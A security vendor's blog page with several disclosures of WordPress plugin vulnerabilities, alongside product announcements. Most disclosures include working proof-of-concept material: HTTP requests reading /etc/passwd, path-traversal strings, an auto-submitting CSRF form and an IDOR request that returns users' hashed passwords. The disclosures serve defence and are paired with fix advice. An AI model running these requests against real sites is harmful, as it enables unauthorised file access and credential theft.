CleanTalk's blog

    Category: Security

    • CVE-2023-4019 – Media from FTP < 11.17 - Author + Arbitrary File Access via Path Traversal

      CVE-2023-4019 – Media from FTP < 11.17 - Author + Arbitrary File Access via Path Traversal

      In a profound exploration of WordPress plugins, a chilling revelation has come to light. During meticulous testing, a high-impact vulnerability was unearthed within the Media from FTP plugin, specifically versions preceding 11.17. This alarming flaw exposes an avenue for attackers to exploit Path Traversal techniques, enabling unauthorized access to sensitive files and documents. The plugin does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.

      Main info:

      CVECVE-2023-4019
      PluginMedia from FTP
      CriticalHigh
      Publicly PublishedAugust 14, 2023
      Last UpdatedAugust 14, 2023
      ResearcherDmtirii Ignatyev
      OWASP TOP-10A5: Broken Access Control
      PoCYes
      ExploitWill be later
      Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4019
      https://wpscan.com/vulnerability/0d323b07-c6e7-4aba-85bc-64659ad0c85d
      Plugin Security Certification by CleanTalk

      Timeline

      July 26, 2023Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
      July 26, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
      July 31, 2023The author has released a fix update
      August 14, 2023Registered CVE-2023-4019

      Discovery of the Vulnerability

      During testing of the plugin, a vulnerability was discovered in the mediafromftp-update-ajax-action, which allows downloading local folders outside of /var/www/html, which gives attackers a huge potential. They can download any local files in the media and then view them for example /etc/passwd, /etc/hosts and other local files/documents. This is possible on behalf of a user with Author rights. By default, the Author is not authorized to view local files and it cannot interact with them directly, viewing local files is very critical for the application owner. To eliminate this vulnerability, I ask you to validate the path that the user enters and if it does not contain a root directory, then do forbidden

      Understanding of Path Traversal attack’s

      Path Traversal, a notorious hacking technique, is at the core of this vulnerability. It involves manipulating file paths to breach directory boundaries and access files beyond the intended scope. Malicious actors exploit this to access files and directories that are otherwise restricted. Path Traversal OWASP TOP-10

      Exploiting the Path Traversal vulnerability

      Exploiting the CVE-2023-4019 vulnerability empowers attackers to venture outside the restricted directory of /var/www/html. This enables them to download local files, even those residing in sensitive system directories.

      POC:

      1) Go to /wordpress/wp-admin/admin.php?page=mediafromftp-search-register

      2) Select any file from the media text list below

      3) Click “Update Media”

      4) Intercept request with action=mediafromftp-update-ajax-action

      5) Сhange new_url to local dir like /etc/passwd or /etc/hosts

      POC request:

      POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

      Host: your_host

      User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0

      Accept: */*

      Accept-Language: en-US,en;q=0.5

      Accept-Encoding: gzip, deflate

      Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=mediafromftp-search-register

      Content-Type: application/x-www-form-urlencoded; charset=UTF-8

      X-Requested-With: XMLHttpRequest

      Content-Length: 123

      Origin: http://your_host

      DNT: 1

      Connection: close

      Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7Cb8692eb78cc5aa5fb9911291a78d34a0e04461ed834d1ca96b121cf1ef714aff; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7C1fe25db056c3038ca9accd05f2608008d9db007ec3d7b37572208454e3f62357; wp-settings-time-2=1690433465

      Sec-Fetch-Dest: empty

      Sec-Fetch-Mode: cors

      Sec-Fetch-Site: same-origin

      action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36

      Potential Risks and Real-World Impact

      The Path Traversal vulnerability within the Media from FTP plugin introduces grave risks and potential scenarios:

      1. Data Exposure:
        Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
      2. Malicious Use of Stolen Data:
        Extracted data from unauthorized file access could be used maliciously, undermining the integrity of the entire system.
      3. System Disruption:
        Access to sensitive files could lead to unintended modifications, potentially disrupting the functioning of the WordPress installation.

      Recommendations for Improved Security

      Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:

      • Immediate Plugin Update:
        Upgrade the Media from FTP plugin to version 11.17 or above. This update addresses the Path Traversal vulnerability and enhances security.
      • Input Validation:
        Developers should incorporate robust input validation mechanisms to ensure that user-provided data is sanitized and restricted to authorized directories.
      • Regular Security Audits:
        Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
      • Path Validation:
        Implement robust path validation mechanisms to ensure that user-entered paths remain within the authorized directory scope.

      Empower the WordPress community with the knowledge of CVE-2023-4019. Share this article far and wide to ensure website owners take proactive measures against this critical vulnerability.

      #WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

      Use CleanTalk solutions to improve the security of your website

      Dmitrii i.

      If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


      Check my website

    • CVE-2023-3814 – Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access via Path Traversal

      CVE-2023-3814 – Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access via Path Traversal

      In the realm of WordPress plugins, a severe security vulnerability has been unveiled. A comprehensive testing process revealed a critical flaw within the Advanced File Manager plugin, specifically versions up to 5.1.1. This vulnerability exposes a significant security lapse that can potentially allow unauthorized access to files and folders through Path Traversal techniques.

      Main info:

      CVECVE-2023-3814
      PluginAdvanced File Manager
      CriticalHigh
      Publicly PublishedAugust 14, 2023
      Last UpdatedAugust 14, 2023
      ResearcherDmtirii Ignatyev
      OWASP TOP-10A5: Broken Access Control
      PoCYes
      ExploitWill be later
      Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3814
      https://wpscan.com/vulnerability/ca954ec6-6ebd-4d72-a323-570474e2e339
      Plugin Security Certification by CleanTalk

      Timeline

      July 13, 2023Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
      July 13, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
      August 9, 2023The author has released a fix update
      August 14, 2023Registered CVE-2023-3814

      Discovery of the Vulnerability

      During testing, it was discovered that it is possible to change the root folder that the plugin will read and show information to the user. Usually in such plugins there is a restriction on exiting the /var/www/html directory, but in this plugin the root folder can be changed to any operating system directory like /home. And you can also perform the same actions using Path Traversal /var/www/html/../../../etc or /home and so on

      Understanding of Path Traversal attack’s

      Path Traversal is a hacking technique that involves manipulating file paths to access files and directories beyond the intended scope. Hackers can exploit this vulnerability to break out of the restricted directory and gain access to sensitive files and directories residing in other parts of the system. Path Traversal OWASP TOP-10

      Exploiting the Path Traversal vulnerability

      Exploiting this Path Traversal vulnerability within the Advanced File Manager plugin could empower attackers to change the root folder, allowing them to view, access, and potentially download files from locations that are off-limits under normal circumstances.

      POC:

      1. Go to settings page (/wordpress/wp-admin/admin.php?page=file_manager_advanced_controls)

      2. In the “Public Root Path” setting, change directory to /home or you can use Path Traversal /var/www/html/../../../home or /var/www/html/wordpress/../../../../etc

      3. Then navigate to the page of plugin (/wordpress/wp-admin/admin.php?page=file_manager_advanced_ui#elf_l1_Lw)

      4. You will be able to list the files/folders outside of WordPress root directory

      Potential Risks and Real-World Impact

      The Path Traversal vulnerability within the Advanced File Manager plugin introduces grave risks and potential scenarios:

      1. Data Exposure:
        Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
      2. Malicious Code Injection to OS folder’s:
        By manipulating file paths, hackers may insert malicious code into system files, leading to the compromise of the entire website.
      3. Escalation of Privileges:
        Exploiting this vulnerability could provide attackers with unauthorized administrative access, leading to unauthorized control and manipulation of the WordPress environment.

      Recommendations for Improved Security

      To fortify your WordPress website against the CVE-2023-3814 vulnerability and enhance overall security, consider implementing the following preventive measures:

      • Immediate Plugin Update:
        Upgrade to Advanced File Manager plugin version 5.1.2 or higher. This update addresses the Path Traversal vulnerability and strengthens security.
      • Input Validation:
        Developers should incorporate robust input validation mechanisms to ensure that user-provided data is sanitized and restricted to authorized directories.
      • Regular Security Audits:
        Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
      • User Awareness:
        Educate administrators about the risks of clicking on unknown links or visiting suspicious websites, emphasizing the importance of vigilance.

      By addressing the Path Traversal vulnerability within the Advanced File Manager plugin and adhering to these security recommendations, you can safeguard your WordPress website from unauthorized file and folder access, mitigating potential breaches and preserving the confidentiality of your data.

      #WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

      Use CleanTalk solutions to improve the security of your website

      Dmitrii i.

      If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


      Check my website

    • We Have Reduced the Malware Code Analysis Time from 36 Hours to 10 Minutes

      We Have Reduced the Malware Code Analysis Time from 36 Hours to 10 Minutes

      In case Security Malware Scanner detects a suspicious file, the file is sent for analysis and, earlier this analysis was done manually by our team.

      For 3 months now the files have been processed by our AI and the average analysis time has decreased from 36 hours to 10 minutes. However, we continue to double-check the results manually in order to guarantee perfect quality. This allowed us to raise the accuracy of the analysis and increase its speed tremendously.

      And this is just the beginning. The AI-driven machine analysis data will be used to train the algorithm further and improve the scanner’s performance.

    • CVE-2023-3720 – Upload Media By URL < 1.0.8 - Stored XSS via CSRF

      CVE-2023-3720 – Upload Media By URL < 1.0.8 - Stored XSS via CSRF

      During a thorough security assessment of the Upload Media By URL plugin for WordPress, a concerning medium-level vulnerability has been uncovered in versions prior to 1.0.8. This vulnerability poses a significant risk to your website’s security and calls for immediate action! If exploited, this vulnerability allows attackers to potentially upload files containing malicious code directly to your WordPress site, exposing your users to harmful scripts and attacks.

      Main info:

      CVECVE-2023-3720
      PluginUpload Media By URL
      CriticalMedium
      Publicly PublishedAugust 2, 2023
      Last UpdatedAugust 2, 2023
      ResearcherDmtirii Ignatyev
      OWASP TOP-10A2: Broken Authentication and Session Management
      PoCYes
      ExploitWill be later
      Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3720
      https://wpscan.com/vulnerability/16375a7f-0a9f-4961-8510-d047ffbf3954
      Plugin Security Certification by CleanTalk

      Timeline

      July 10, 2023Plugin testing and vulnerability detection in the Upload Media By URL plugin have been completed
      July 10, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
      July 17, 2023The author has eliminated the vulnerability and patched his plugin
      August 2, 2023Registered CVE-2023-3720

      Discovery of the Vulnerability

      During a security assessment of the Upload Media By URL plugin for WordPress, a medium vulnerability was identified in versions prior to 1.0.8. The plugin lacked Cross-Site Request Forgery (CSRF) protection when handling file uploads, allowing attackers to trick logged-in administrators into uploading files on their behalf, including HTML files containing malicious JavaScript code that could execute when accessed by users with the unfiltered_html capability.

      Understanding Cross-Site Request Forgery (CSRF)

      Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated user to execute unwanted actions on a web application without their knowledge or consent. In this case, attackers can exploit the absence of CSRF protection in the Upload Media By URL plugin to create a crafted HTML file hosted on an external server. If a privileged user, such as an administrator, unknowingly accesses the external link, the malicious HTML file can trigger the upload of harmful files onto the WordPress system.

      Exploiting the Cross-Site Request Forgery (CSRF) vulnerability

      By crafting a malicious HTML file that includes a CSRF payload, attackers can entice administrators with upload privileges to visit the external link. Once the link is accessed, the malicious file exploits the lack of CSRF protection in the plugin to perform unauthorized actions, effectively tricking the administrator into uploading harmful files to the WordPress site.

      POC code:

      <html>

        <body>

        <script>history.pushState(”, ”, ‘/’)</script>

          <form action=”http://your_site/wordpress/wp-admin/upload.php” method=”POST” enctype=”multipart/form-data”>

            <input type=”hidden” name=”multiurl” value=”http://your_external_server/123.html” />

            <input type=”submit” value=”Submit request” />

          </form>

          <script>

            document.forms[0].submit();

          </script>

        </body>

      </html>

      Potential Risks and Real-World Impact

      The CSRF vulnerability in the Upload Media By URL plugin poses severe risks to website administrators and users alike. Beyond the technical implications, it also serves as a potential tool for social engineering attacks. Real-world scenarios include:

      1. Stored Cross-Site Scripting (XSS) Attacks::
        Attackers could upload HTML files containing embedded XSS payloads, compromising the security and privacy of users accessing the affected pages, and potentially exposing sensitive data or credentials.In almost all cases , Stored XSS is used to steal cookies , thereby Account Takeover.
      2. Malware Distribution:
        Malicious files, such as infected scripts or executables, could be uploaded, leading to the dissemination of malware among website visitors or affecting the overall integrity of the website.
      3. Unauthorized Content Injection:
        Attackers might use this vulnerability to inject unauthorized content into the website, damaging the site’s reputation, or defacing it with inappropriate or harmful materials.
      4. Social Engineering Exploits:
        Since the plugin allows the upload of files, attackers could craft seemingly innocent files (e.g., images, documents) with misleading names or enticing content to lure unsuspecting users into downloading or opening the files, facilitating social engineering attacks.

      Recommendations for Improved Security

      To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

      • Immediate Plugin Update:
        Website administrators should update the Upload Media By URL plugin to the latest version, which includes CSRF protection and patches this vulnerability.
      • Implement CSRF Protection:
        Plugin developers should include robust CSRF protection mechanisms when processing sensitive actions, such as file uploads, to prevent unauthorized access.
      • Regular Security Audits:
        Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
      • User Privilege Restriction:
        Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
      • User Awareness:
        Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.

      By addressing the CSRF vulnerability in the Upload Media By URL plugin and implementing these security recommendations, website owners can significantly reduce the likelihood of security breaches, protect their site’s integrity, and safeguard against social engineering exploits.

      Use CleanTalk solutions to improve the security of your website

      Dmitrii i.

      If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


      Check my website

    • CleanTalk Security Plugin Tools for WordPress

      CleanTalk Security Plugin Tools for WordPress

      1. Protection against brute-force attacks is essential to prevent unauthorized access to systems and accounts. Brute-force attack is a method where attackers sequentially try all possible combinations of account passwords and sometimes gain access to the system. The CleanTalk plugin has options such as:
        1.1. Number of unsuccessful authorizations before blocking occurs.
        1.2. Lockout time of the visitor which is the time period between login attempts.
        1.3. Time period the IP will be blocked for when the limit of unsuccessful authorizations is reached.

      2. User Actions Log is designed to track user actions in the WordPress Dashboard and ensure security. It allows you to record and display user actions in real time, to see which pages of the website backend and at what time they were visited. This tool is useful for detecting and preventing hacking attempts, unauthorized access, and other suspicious activities on the website.

      3. Security Firewall is designed to block access to the site under certain conditions:
        3.1. CleanTalk Database of Dangerous IP Addresses is being used to block access to the site for those IP addresses that have already participated in hacking attempts into other sites.
        3.2. Your Personal Lists of IP Addresses is being used to block access to the site.
        You can add custom IP addresses, networks, and countries on your CleanTalk Dashboard.
        Visitors that were blocked by the Security FireWall will not be able to pass it and get to your site.

      4. Security Report provides a summary of how the plugin works on your websites. The report is being sent once a week to your email address and provides the following statistics:
        4.1. Blocked requests in Security FireWall
        4.2. Number of brute-force attempts
        4.3. Successful admin logins
        4.4. Malware scanner statistics

      5. The option “Notifications of administrator users authorizations” sends you a notification by email every time you successfully log in with an administrator account. This allows you to quickly receive information about unauthorized users.

      6. Real-Time Traffic Monitor feature provides you with real-time traffic information on your website. It helps you in tracking visitors activity and detect potentially malicious traffic — these can be password cracking attempts, SQL injections, DDOS attacks, and other threats.

        The feature also allows you to see bots activity on your site. Bots can have different intentions, but it’s important to be able to distinguish real users from automated bots. You can view the list of bots and take action to block unwanted activity.
        You can see data such as IP address, location, country, and other information that will help determine if a visitor is a suspicious or unwanted bot. It will also help you make the appropriate security settings.

        The feature works In real time, meaning you can see the activity immediately without a delay. You can view the current users on the site, as well as which pages or sections of the site are currently being viewed.

      7. Malware Scanner is one of the features of the CleanTalk Security Plugin for WordPress that is designed to detect and remove malicious code on your website.
        Daily automatic site scanning. The plugin scans your site once a day and you will receive up-to-date information about your site cleanness. You can choose the time period for the automatic site scanning — every 12 hours, 24 hours, 3 days, 7 days, 14 days, or every 30 days.

        The Malware Scanner feature analyzes all files on your site, including the WordPress core files, themes and plugins. It looks for vulnerabilities, malicious scripts, and other suspicious elements that may be related to malicious code.

        When Malware Scanner detects malware or suspicious files, it alerts you instantly via email. You will receive a detailed report of the found threats, including the file names. This will help you quickly respond and take necessary actions to remove malware.

        Automatic Malicious Code Removal: The CleanTalk Security Plugin for WordPress provides this feature to automatically remove malicious code. If there is a known signature for the detected malicious code, the file will be disinfected automatically.

      8. The option “Collect and send PHP log” allows you to automate the process of checking your PHP logs for errors that occur while your site is running. Errors could appear for a short period of time and only when one specific function is running, they can’t be spotted in other circumstances so sometimes it’s hard to catch them. The CleanTalk Scanner will check your website backend once per hour. Statistics of errors are available in your CleanTalk Dashboard.

      9. 2FA: WordPress Two-Factor Authentication is a tool to provide an additional level of security for the website administrator account.
        The main purpose of 2FA is to protect user accounts from unauthorized access, even if an attacker knows the user’s password.
        When a user enters their password to log into their WordPress account, 2FA requires them to provide a second authentication code. The code is being sent to the WordPress account email address.

        The CleanTalk Security plugin allows administrators to set up 2FA for various user roles. So they can grant 2FA to certain groups of users.
        The option “Custom WP-Login URL” in the CleanTalk Security Plugin for WordPress allows you to change the default login URL of your WordPress Dashboard (wp-login.php). This is useful for several reasons:

        • Protection against brute-force attacks: Changing the login URL of the admin panel makes it less predictable and harder for attackers to determine. Most brute-force scripts and bots look for the standard URL, so using a custom URL improves security.
        • Hiding the fact that WordPress is being used: Many hackers and attackers specifically look for sites built on WordPress in order to gain access to them. Changing the login URL makes your site less vulnerable for attacks that are being made by the principle “Default WordPress Login URL Search” .
        • If you use a custom login URL, this may be more memorable and convenient for you. You can choose an URL that is easy to remember or related to your brand.
        • Prevent spam and DDoS attacks: Changing your login URL can help you prevent spam bots and DDoS attacks that often target a standard URL. This can significantly reduce the amount of unwanted activity and improve the performance of your site.

      10. The option “Prevent collecting of authors’ logins” in the CleanTalk Security Plugin for WordPress is an additional tool to protect your site from malicious attacks and unauthorized access.

        One of the most common ways of attacking websites is by attempting to hijack the accounts of the administrator or content authors. A hacker can use various methods to gain access to usernames and passwords and use them for malicious purposes such as injecting malicious code, modifying website content, and even stealing user data.

        The option in the CleanTalk Security Plugin can greatly reduce the risk of such attacks. This feature allows you to hide the names of your authors (logins) from public view on the site, storing them in the database for administrative access only.

        Firstly, it will prevent attackers from accessing authors’ data, which will significantly complicate the hacking process. Secondly, the site will look more secure and inaccessible to hackers. Thirdly, using this option reduces the likelihood of data leakage and privacy violations.

      11. The option “Disable XML-RPC” in the CleanTalk Security Plugin is an important step to increase security and prevent potential attacks on your site.

        XML-RPC is a protocol that allows you to remotely interact with your WordPress site. It was created to facilitate data transfer and information exchange with other platforms. However, due to several vulnerabilities, XML-RPC can become an entry point for hackers.

        One of the main reasons for disabling XML-RPC is the possibility of an attack called brute-force. This attack involves attempts to forcefully input different random passwords for administrative accounts in a rapid succession. XML-RPC, by its very nature, allows attackers to carry out such attacks because it allows iterative validation of multiple passwords without restrictions. Disabling XML-RPC greatly reduces the risk of such attacks and prevents unauthorized access to your site.

        In addition, XML-RPC can also be used to carry out DDoS (Distributed Denial of Service) attacks. Attackers can use XML-RPC to send a large number of requests to your site at the same time, which can lead to server overload and temporary site denial of service. Disabling XML-RPC protects your site from such attacks and helps keep it running for your visitors.

        Disabling XML-RPC in WordPress is quite simple. You can do this with the CleanTalk Security Plugin and enable the option “Disable XML-RPC”. It is recommended to disable XML-RPC unless you are using it to communicate with other platforms or services.

      12. The option “Disable REST API for non-authenticated users”. The REST API is a set of programming interfaces that allow you to interact with your WordPress site and access data and functionality. However, access to the REST API can become a vulnerability for attackers if the option “Disable REST API for non-authenticated users” is not enabled. Examples: getting a list of all posts, creating a new post or updating an existing one, deleting a post, getting/creating users and comments.

        Disabling the REST API for unauthenticated users has several benefits. First, it reduces the risk of an attack on your site. If an attacker gains access to the REST API, they can use this opportunity to obtain sensitive data, change site content, or perform other unwanted actions. Disabling the REST API for unauthenticated users helps in preventing these potential attacks.

        Second, disabling the REST API for unauthenticated users helps improve the performance of your site. The REST API can put a load on the server, especially when trying to process many requests from unauthenticated users. Disabling this feature for these users reduces the server load and speeds up your site response.

        Enabling the option “Disable REST API for non-authenticated users” in the CleanTalk Security Plugin is very simple. Just activate this option in the plugin settings and save the changes. It is important to note that this option will not affect authenticated users, and they will be able to continue using the REST API without any issues. If you only use the WordPress Dashboard to work with the site and want to increase the security level of your resource, then it is recommended to disable the WP REST API.

      13. The option “Forbid to show your website in <iframe> tags on third-party websites” in CleanTalk Security prevents your site from being embedded in an <iframe> on other websites. An <iframe> is an HTML element that allows you to embed one web page inside another. Technically speaking, <iframe> can be used to display your site on other third-party sites while still maintaining visual and functional content. However, this can also lead to security risks and undesirable consequences.

        This has several advantages. First, it protects your site from potential fraudulent activities. Some attackers may create embedded iframe-copies of your website to fraudulently collect personal information from your visitors or malicious targets. Disabling <iframe> prevents this possibility and protects your users.

        Second, opting out of showing your site in an <iframe> on third-party websites helps you control content and prevent copyright loss. If your site is embedded in another website’s <iframe> without your consent, this may result in improper display and control of your content. Disabling <iframe> allows you to retain full control over how and where your site is displayed.

        Enabling the option “Forbid to show your website in <iframe> tags on third-party websites”in the CleanTalk Security Plugin is very simple. It is enough to activate this option in the plugin settings, and your site will be protected from embedding in <iframe> tags on third-party websites.

      14. The option “Add these headers to the HTTP responses on the public pages: X-Content-Type-Options, X-XSS-Protection” in CleanTalk Security allows you to add the X-Content-Type-Options and X-XSS-Protection security headers to the HTTP responses on your site’s public pages. These headers tell browsers how to process the content of the page and prevent possible XSS-based attacks and malware downloads.

        XSS (cross-site scripting) and drive-by download attacks are among the most common and dangerous threats in the online environment. XSS attacks can allow attackers to inject and execute malicious code on your site, while drive-by download attacks attempt to download and install malicious software without the admin’s knowledge.

        The X-Content-Type-Options header tells the browser that page content should only be processed according to the specified MIME type (Multipurpose Internet Mail Extensions). This helps prevent possible attacks based on the content type and provides an additional layer of protection.

        The X-XSS-Protection header is designed to protect against XSS (cross-site scripting) attacks. It includes built-in protection mechanisms in the browser that allow you to detect and block attempts to execute malicious scripts in a timely manner.
        Enabling the option “Add these headers to the HTTP responses on the public pages: X-Content-Type-Options, X-XSS-Protection” in the CleanTalk Security Plugin is very simple. Just enable this option in the plugin settings and headers will be automatically added to the HTTP responses on public pages of your site.

        In this article we have tried to tell you about the main and most useful options of the CleanTalk Security Plugin for WordPress. You can install the plugin from the official WordPress directory here: https://wordpress.org/plugins/security-malware-firewall

        If you have any questions about the CleanTalk Security Plugin functions, feel free to ask them in the comments and we will be happy to assist you.
    • CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)

      CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)

      We have discovered a severe security vulnerability in the Simple Author Box plugin (CVE-2023-3601), which puts your WordPress accounts at high risk of being compromised. This vulnerability allows attackers with Contributor-level access or higher to steal sensitive user information, including hashed passwords.

      Main info:

      CVECVE-2023-3601
      PluginSimple Author Box
      CriticalVery High
      Publicly PublishedJuly 24, 2023
      Last UpdatedJuly 24, 2023
      ResearcherDmtirii Ignatyev
      OWASP TOP-10A01:2021-Broken Access Control
      PoCYes
      ExploitWill be later
      Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3601
      https://wpscan.com/vulnerability/c0cc513e-c306-4920-9afb-e33d95a7292f
      Plugin Security Certification by CleanTalk

      Timeline

      July 5, 2023Plugin testing and vulnerability detection in the Simple Author Box plugin have been completed
      July 6, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
      July 16, 2023The author has eliminated the vulnerability and patched his plugin
      July 24, 2023Registered CVE

      Discovery of the Vulnerability

      During a thorough security assessment, I identified a critical security flaw in the Simple Author Box plugin for WordPress (CVE-2023-3601) , specifically affecting versions up to and including 2.51. This vulnerability arises from an Insecure Direct Object Reference (IDOR) issue within the plugin’s code. The plugin fails to properly validate user input when handling requests (action=sab_get_author) to fetch information about specific users, leading to the unauthorized disclosure of sensitive user details.

      Understanding Insecure Direct Object Reference (IDOR)

      Insecure Direct Object Reference is a type of security vulnerability where an application exposes direct references to internal objects, such as files, database records, or resources, without proper access controls. Attackers can manipulate these exposed references (often through changing parameters or input values) to access unauthorized data or functionalities.

      Exploiting the IDOR Vulnerability

      In the context of the Simple Author Box vulnerability, the plugin does not adequately check whether a user is authorized to access specific user information before displaying it. By altering the user ID parameter in a request, an authenticated attacker with Contributor-level permissions or higher can access personal information of other users, including potentially sensitive data such as hashed passwords (CVE-2023-3601).

      POC:

      1. Create a new Post as a Contributor user.

      2. Add the “Simple Author Box” block.

      3. Intercept the request to `/wp-admin/admin-ajax.php` upon addition of the block. Change the `author_ID` parameter to an ID of a user of your choosing.

      4. Inspect the response to see all of the information about that user, including the hashed password.

      POC request:

      POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
      Host: your_site_here
      User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: /
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://your_site_here/wordpress/wp-admin/post-new.php
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 50
      Origin: http://your_site_here
      Connection: close
      Cookie: thc_time=1693728697; wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C144c7182810741c5eae1d56f1a732319616b45d658a97cb2467966f1a9fa19de; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D0; wp-settings-time-1=1691260835; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C65dd803dab6a195a6d2c2ff57c23361a622ab5130f1dd3da09ae9076153598ec
      Sec-Fetch-Dest: empty
      Sec-Fetch-Mode: cors
      Sec-Fetch-Site: same-origin

      action=sab_get_author&author_ID={here_you_can_put_number_from_0_to_9999}&nonce=bc05e90fd7

      Potential Risks and Real-World Impact

      The IDOR vulnerability in the Simple Author Box plugin introduces severe risks to both website administrators and users. Some of the potential real-world impact includes:

      1. Unauthorized Data Exposure:
        Attackers can view and collect sensitive user information, leading to privacy violations and potential misuse of user data.
      2. Credential Compromise:
        Disclosure of hashed passwords can enable attackers to launch offline attacks, attempting to crack passwords and potentially gain unauthorized access to user accounts.
      3. Identity Impersonation:
        The leaked information could facilitate identity theft or social engineering attacks, compromising the integrity of user accounts and potentially affecting the reputation of the website.

      Recommendations for Improved Security

      To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

      • Immediate Plugin Update:
        The developers of Simple Author Box should release a patched version that addresses the IDOR vulnerability. Website administrators should promptly update to the latest secure version to prevent exploitation.
      • Security Best Practices:
        Plugin developers should adhere to secure coding practices, including input validation, proper access controls, and sanitization of user data.
      • Regular Security Audits:
        Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
      • User Privilege Restriction:
        Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
      • User Awareness:
        Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.

      By addressing the IDOR vulnerability in the Simple Author Box plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the privacy and integrity of their users’ data.

      Use CleanTalk solutions to improve the security of your website

      Dmitrii ignatyev

      If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


      Check my website

    • Poll: Do you need the option of encrypting/hashing ip/email addresses when transferring to the cloud?

      Poll: Do you need the option of encrypting/hashing ip/email addresses when transferring to the cloud?

      More and more users are concerned about the privacy of the data they send through forms on websites. Sometimes this can lead to forms not being submitted if there is no assurance that the data is completely private.

      We are considering the possibility to hash all the data that is transferred into CleanTalk cloud. This will significantly increase the security of your data during transmission. For example:

      Before hashingAfter hashing
      em***@ex*****.com2a539d6520266b56c3b0c525b9e6128858baeccb5ee9b694a2906e123c8d6dd3

      Do you need the option of encrypting/hashing ip/email addresses when transferring to the cloud?

      View Results

      Loading ... Loading …

      Attention! If you enable encryption, you will lose access to information about the real IP/Email of the visitor and will not be able to track these data in Anti-Spam reports and log.

    • Manage your WooCommerce Spam Orders in one place

      Manage your WooCommerce Spam Orders in one place

      Good news, Everyone WooCommerce users!

      Now you can find all WooCommerce orders marked as spam in a separate folder. This is designed to ensure you don’t miss any orders and save you time accessing them.

      How to access WooCommerce Spam Orders

      1. Make sure, your WooCommerce is properly connected to your website.

      2. Go to your WordPress dashboardCleanTalkAnti-Spam and click on the WooCommerce spam orders link.

        The spam folder can also be accessed from your Anti-Spam plugin settings (Dashboard Plugins Installed pluginsAnti-Spam by CleanTalk).

    • White Label Option for Anti-Spam and Security Plugins

      White Label Option for Anti-Spam and Security Plugins

      We are proud to introduce the White Label option for our Anti-Spam and Security plugins. This option gives Unlimited plan users the ability to resell Anti-Spam or Security services to their customers under their own brand name. The Extra Package should be connected as well.

      Here’s what you get

      • Any CleanTalk and affiliate program mentions will be removed.
      • Absolutely all links to CleanTalk.org will be replaced with your custom URL.
      • The contact information of tech support will be replaced with yours.
      • All Connection problems reports will be sent to your support email.

      How to connect the White Label option for regular installation (not for Multisite)

